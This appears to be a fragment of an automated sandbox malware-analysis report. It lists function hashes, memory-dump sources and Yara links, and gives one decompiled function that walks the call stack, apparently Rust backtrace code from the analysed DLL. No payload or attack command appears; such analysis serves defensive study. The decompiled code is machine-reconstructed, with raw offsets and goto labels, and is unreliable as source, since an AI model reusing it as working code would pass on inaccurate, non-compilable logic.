Instruction Fuzzy Hash: A82139B1D0020CBFDB15DFE5C88A8EEBBB9FB48358F108088E51466250D3B99A559B91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5314, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137f8063ab8a4e6c48daa6564079e0f37c3fb48828de76ab16e4e7a031f92ad0
Instruction ID: 860b5550eca7211a3d88ec533bc11112768e96ab9960f88254e0056e6f63c4ce
Opcode Fuzzy Hash: 137f8063ab8a4e6c48daa6564079e0f37c3fb48828de76ab16e4e7a031f92ad0
Instruction Fuzzy Hash: 6921C0B1D1020DEBDB18CFE5D94A5AEBBF1BB14718F208589E414A6284DBB85B18CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2BFE0, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd6c4ea3474ea432eb113beac885845107d3d841ce161151dcd6ae9948b4826
Instruction ID: 53932bfb0d471624097a1d2cbc26d6552abc8ebcd0f3fd3321406d52450b8d70
Opcode Fuzzy Hash: fcd6c4ea3474ea432eb113beac885845107d3d841ce161151dcd6ae9948b4826
Instruction Fuzzy Hash: E4014631311201CFD758CF68C6A0F29B3E2BF8568CB5544B9D9128F759DBB1EC00CA40

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3298C, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
Instruction ID: e43bef9ff51c0407c43375d36c671728b654bfb6eb320ce91605a2bd20cce164
Opcode Fuzzy Hash: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
Instruction Fuzzy Hash: 3AE08C32911238EBCB11CBC8C90098AF3EDEB4AB04B6108A6F501E3200C2B4DE00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED312CB, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
Instruction ID: 68f58a844a797b89850cc343a86bfe2654afe74e036cd0aa3fec9eee9a6f58bd
Opcode Fuzzy Hash: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
Instruction Fuzzy Hash: 45C08C3804092286CE298BD083723A433A9F387786FA8288CC8028B641C61ED88BD630

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4315, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1DD30, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ED1DD30(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6ED239E0;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6ED2E9D0(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6ed5f8cc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6ED39A30(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6ED39470(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ed606e0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6ED20D10(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6ed6e128, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6ed6e128, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6ed6e128, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6ed5fdd8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed5f570;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6ED12150( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6ed6e128, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6ed5fde0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6ED2E9D0(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6ED2C5AE();
						_t217 = E6ED1E4E0(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6ed6e148; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6ed6e130, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6ED394E0(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed60ad0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6ed6e148 = _t218;
									_t267 =  *0x6ed6e14c; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6ed6e14c; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6ed6e158; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6ED2E9D0(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6ED1E6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6ed6e130, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6ED2E9D0(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6ed6e144; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6ed6e130, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6ED394E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed60ad0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6ed6e144 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6ED1E6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6ed6e158 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6ed6e130, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6ED394E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed60ad0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6ED1E6D0( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6ed6e14c = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6ed6e128, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6ed5fe4c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed5f570;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6ED12150( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}

0x6ed1dd33
0x6ed1dd34
0x6ed1dd35
0x6ed1dd39
0x6ed1dd3f
0x6ed1dd41
0x6ed1dd47
0x6ed1dd4d
0x6ed1dd57
0x6ed1dd71
0x6ed1dd77
0x6ed1dd7e
0x6ed1dd80
0x6ed1dd83
0x6ed1dd94
0x6ed1dd99
0x6ed1dd9c
0x6ed1dda1
0x6ed1dda6
0x6ed1ddad
0x6ed1ddb0
0x6ed1ddb7
0x6ed1ddba
0x6ed1ddc7
0x6ed1ddca
0x6ed1dde6
0x6ed1dde6
0x6ed1ddec
0x6ed1ddf0
0x6ed1ddf2
0x6ed1ddf4
0x6ed1ddfe
0x6ed1de02
0x6ed1de07
0x6ed1de0d
0x6ed1de0d
0x6ed1de10
0x6ed1de13
0x6ed1de16
0x6ed1de19
0x6ed1de1c
0x6ed1de1f
0x6ed1ddcc
0x6ed1de30
0x6ed1de30
0x6ed1de36
0x6ed1de3d
0x6ed1de3d
0x6ed1de40
0x6ed1de42
0x6ed1de4a
0x6ed1de50
0x6ed1de54
0x6ed1de62
0x6ed1ddd0
0x6ed1ddd3
0x6ed1ddd5
0x6ed1de8d
0x6ed1de90
0x6ed1de9a
0x6ed1de9c
0x6ed1e3b8
0x00000000
0x6ed1dea2
0x6ed1dea2
0x6ed1dea5
0x6ed1dea8
0x6ed1dea9
0x6ed1deae
0x6ed1deb4
0x6ed1deb9
0x6ed1debb
0x6ed1debe
0x6ed1dec3
0x6ed1dec6
0x6ed1dec8
0x00000000
0x00000000
0x6ed1deca
0x00000000
0x6ed1dec8
0x6ed1dddb
0x6ed1dddb
0x6ed1dde1
0x6ed1dde4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1dde4
0x6ed1de77
0x6ed1de7a
0x6ed1de82
0x6ed1de85
0x00000000
0x6ed1de8b
0x00000000
0x6ed1de8b
0x00000000
0x6ed1de85
0x6ed1decc
0x6ed1decc
0x6ed1ded2
0x6ed1ded4
0x6ed1ded7
0x6ed1dede
0x6ed1dee1
0x6ed1dee3
0x6ed1dee5
0x6ed1dee5
0x6ed1dee9
0x6ed1deeb
0x6ed1def0
0x6ed1defd
0x6ed1defd
0x6ed1def0
0x6ed1dee9
0x6ed1df02
0x6ed1df02
0x6ed1df04
0x6ed1df6e
0x6ed1df71
0x6ed1df74
0x6ed1df77
0x6ed1df7a
0x6ed1df06
0x6ed1df06
0x6ed1df0a
0x6ed1df0c
0x6ed1df11
0x6ed1df17
0x6ed1df22
0x6ed1df24
0x6ed1df27
0x6ed1df2a
0x6ed1df2d
0x6ed1df31
0x6ed1df33
0x6ed1df35
0x6ed1df39
0x6ed1df3b
0x6ed1df3b
0x6ed1df47
0x6ed1df4c
0x6ed1df4c
0x6ed1df58
0x6ed1df58
0x6ed1df5d
0x6ed1df60
0x6ed1df62
0x6ed1df62
0x6ed1df84
0x6ed1df87
0x6ed1df8d
0x6ed1df90
0x6ed1df93
0x6ed1df9d
0x6ed1dfa7
0x6ed1dfb1
0x6ed1dfbb
0x6ed1dfc8
0x6ed1dfd1
0x6ed1dfd2
0x6ed1dfd7
0x6ed1dfda
0x6ed1dfdc
0x6ed1e255
0x6ed1e255
0x6ed1e258
0x6ed1e25a
0x6ed1e25c
0x6ed1e260
0x6ed1e26b
0x6ed1e26b
0x6ed1e260
0x6ed1e270
0x00000000
0x6ed1dfe2
0x6ed1dfe2
0x6ed1dfe8
0x6ed1dfef
0x6ed1dff3
0x6ed1dff6
0x6ed1dffd
0x6ed1dfff
0x6ed1e008
0x6ed1e00e
0x6ed1e011
0x6ed1e018
0x6ed1e01c
0x6ed1e022
0x6ed1e028
0x6ed1e02e
0x6ed1e036
0x6ed1e03f
0x6ed1e049
0x6ed1e050
0x6ed1e055
0x6ed1e058
0x6ed1e059
0x6ed1e05e
0x6ed1e063
0x6ed1e065
0x6ed1e076
0x6ed1e07c
0x6ed1e07f
0x6ed1e081
0x6ed1e09a
0x6ed1e0a0
0x6ed1e0a2
0x6ed1e3e5
0x6ed1e3fe
0x00000000
0x6ed1e0a8
0x6ed1e0a8
0x6ed1e0aa
0x6ed1e0af
0x6ed1e0b5
0x6ed1e0b7
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1e0b7
0x6ed1e083
0x6ed1e083
0x6ed1e089
0x6ed1e08b
0x6ed1e0d9
0x6ed1e0de
0x6ed1e0e1
0x6ed1e0e6
0x6ed1e0e9
0x6ed1e0ec
0x6ed1e0ee
0x6ed1e10e
0x6ed1e10e
0x6ed1e117
0x6ed1e11e
0x6ed1e12d
0x6ed1e132
0x6ed1e147
0x6ed1e14e
0x6ed1e151
0x6ed1e15b
0x6ed1e161
0x6ed1e16b
0x6ed1e175
0x6ed1e17b
0x6ed1e185
0x6ed1e190
0x6ed1e1ae
0x6ed1e1b1
0x6ed1e1b4
0x00000000
0x00000000
0x6ed1e1c6
0x6ed1e1cc
0x6ed1e1d6
0x6ed1e1db
0x6ed1e1de
0x6ed1e1e1
0x6ed1e1e3
0x00000000
0x00000000
0x00000000
0x6ed1e1e3
0x00000000
0x6ed1e0f0
0x6ed1e0fb
0x6ed1e101
0x6ed1e103
0x6ed1e2b4
0x6ed1e2b9
0x6ed1e2ce
0x6ed1e2d5
0x6ed1e2dc
0x6ed1e2e6
0x6ed1e2ed
0x6ed1e2f0
0x6ed1e2fa
0x6ed1e300
0x6ed1e30a
0x6ed1e314
0x6ed1e31a
0x6ed1e324
0x6ed1e330
0x6ed1e330
0x6ed1e336
0x6ed1e338
0x6ed1e356
0x6ed1e372
0x6ed1e374
0x6ed1e377
0x6ed1e1e5
0x6ed1e1e8
0x6ed1e1ed
0x6ed1e1f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1e33a
0x6ed1e345
0x6ed1e34b
0x6ed1e34d
0x6ed1e3c2
0x6ed1e3db
0x00000000
0x6ed1e34f
0x6ed1e34f
0x6ed1e351
0x00000000
0x6ed1e351
0x6ed1e34d
0x00000000
0x6ed1e37d
0x6ed1e38d
0x6ed1e393
0x6ed1e39d
0x6ed1e3a2
0x6ed1e3a5
0x6ed1e3a8
0x6ed1e3a8
0x00000000
0x6ed1e109
0x6ed1e109
0x00000000
0x6ed1e109
0x6ed1e103
0x6ed1e08d
0x6ed1e0b9
0x6ed1e0c4
0x6ed1e0ca
0x6ed1e0cc
0x6ed1e408
0x6ed1e421
0x6ed1e429
0x6ed1e429
0x6ed1e430
0x6ed1e44c
0x6ed1e0d2
0x6ed1e0d2
0x6ed1e0d4
0x00000000
0x6ed1e0d4
0x6ed1e0cc
0x6ed1e08b
0x6ed1e067
0x6ed1e067
0x6ed1e06b
0x00000000
0x6ed1e071
0x6ed1e1f3
0x6ed1e1f3
0x6ed1e1f7
0x6ed1e287
0x6ed1e287
0x6ed1e28a
0x6ed1e28c
0x6ed1e28e
0x6ed1e292
0x6ed1e29d
0x6ed1e29d
0x6ed1e292
0x6ed1e2a2
0x6ed1e1fd
0x6ed1e200
0x6ed1e20a
0x6ed1e214
0x6ed1e21e
0x6ed1e228
0x6ed1e232
0x6ed1e248
0x6ed1e249
0x6ed1e251
0x6ed1e253
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1e253
0x6ed1e1f7
0x6ed1e272
0x6ed1e278
0x6ed1e286
0x6ed1e286
0x6ed1e065
0x6ed1dfdc
0x00000000

APIs

SetLastError.KERNEL32(00000000), ref: 6ED1DE42
GetCurrentDirectoryW.KERNEL32(?,?), ref: 6ED1DE4A
GetLastError.KERNEL32 ref: 6ED1DE56
GetLastError.KERNEL32 ref: 6ED1DE68
GetLastError.KERNEL32 ref: 6ED1DECC
HeapFree.KERNEL32(00000000,00000000), ref: 6ED1DEFD
HeapFree.KERNEL32(00000000,?), ref: 6ED1DF47
HeapFree.KERNEL32(00000000,?), ref: 6ED1DF58
GetCurrentProcess.KERNEL32(?), ref: 6ED1E031
GetCurrentThread.KERNEL32 ref: 6ED1E039
RtlCaptureContext.KERNEL32(?), ref: 6ED1E059
GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6ED1E09A
GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6ED1E0C4
GetCurrentProcess.KERNEL32 ref: 6ED1E0D9
GetProcAddress.KERNEL32(StackWalkEx), ref: 6ED1E0FB
ReleaseMutex.KERNEL32(?), ref: 6ED1E1E8
HeapFree.KERNEL32(00000000,?), ref: 6ED1E26B
HeapFree.KERNEL32(00000000,?,?), ref: 6ED1E29D
GetProcAddress.KERNEL32(StackWalk64), ref: 6ED1E345

Strings

StackWalkEx, xrefs: 6ED1E0F0
SymGetModuleBase64, xrefs: 6ED1E0B9
StackWalk64, xrefs: 6ED1E33A
SymFunctionTableAccess64, xrefs: 6ED1E08F
called `Option::unwrap()` on a `None` value, xrefs: 6ED1E3CC, 6ED1E3EF, 6ED1E412

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
API String ID: 1381040140-1036201984
Opcode ID: e0eeed8ee4ab3892ae86ceabb33d1e5c146884644e7806e037e1eb8d885e7b07
Instruction ID: 10e5435a145b763173f98cd6410c0dfee4366192d46b81099601e362fd13b71c
Opcode Fuzzy Hash: e0eeed8ee4ab3892ae86ceabb33d1e5c146884644e7806e037e1eb8d885e7b07
Instruction Fuzzy Hash: 661226B0604B009FE761CFA1D894B97BBF4BB4A308F00492DD99A8BB90D775F549CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C700, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 477
memoryCOMMON

Download Yara Rule

